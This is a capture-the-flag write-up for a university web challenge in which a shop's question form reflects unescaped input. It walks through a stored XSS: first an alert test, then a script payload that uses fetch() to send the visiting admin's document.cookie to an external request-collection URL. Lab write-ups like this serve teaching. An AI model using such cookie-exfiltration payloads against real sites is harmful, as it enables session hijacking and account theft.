All dat cookies... njam njam!

Description

You found the flag of your dream, but still you are unsure if it is the best fit for you? We got you covered! You can send us your questions and we will do our best to look at your comments ASAP.

You can reach our shop at: https://sfl.cs.tu-dortmund.de:10004/

NOTE: Our shop admins are not supposed to visit external links, hence we block them. But you may find it useful to use our "Request Basket" instead: https://sfl.cs.tu-dortmund.de:10005/

Solution

The challenge description mentions a "Request Basket" so as a first step head to https://sfl.cs.tu-dortmund.de:10005/ and create one.

After that, let us head to a Flag of choice and take a look at the question section. After entering a question and clicking submit we get a URL where we can look at the answer.

Question formualr with an url

By visiting the provided link we come to the page where the (automated) shop staff tells us it is unable to help us... . But whats more interesting, we can see the text we entered into the question form earlier.

Question answer page

What about to enter some code? We could send a question with the following content:

<script> alert("I HAVE A QUESTION ABOUT YOUR SECURITY!") </script>

Interesting... Now the answer page has executed our code snipped looks like this:

answerpage with alert

But sadly no sing of a Fl4g.

Let's combine this XSS with the "Request Basket" we created earlier. Use the question: 

<script> fetch("your_request_bucket_url?flag=" + document.cookie) </script>

After submitting the Question form, go over to the "Request Basket" and there is the flag:

Request Basket with flag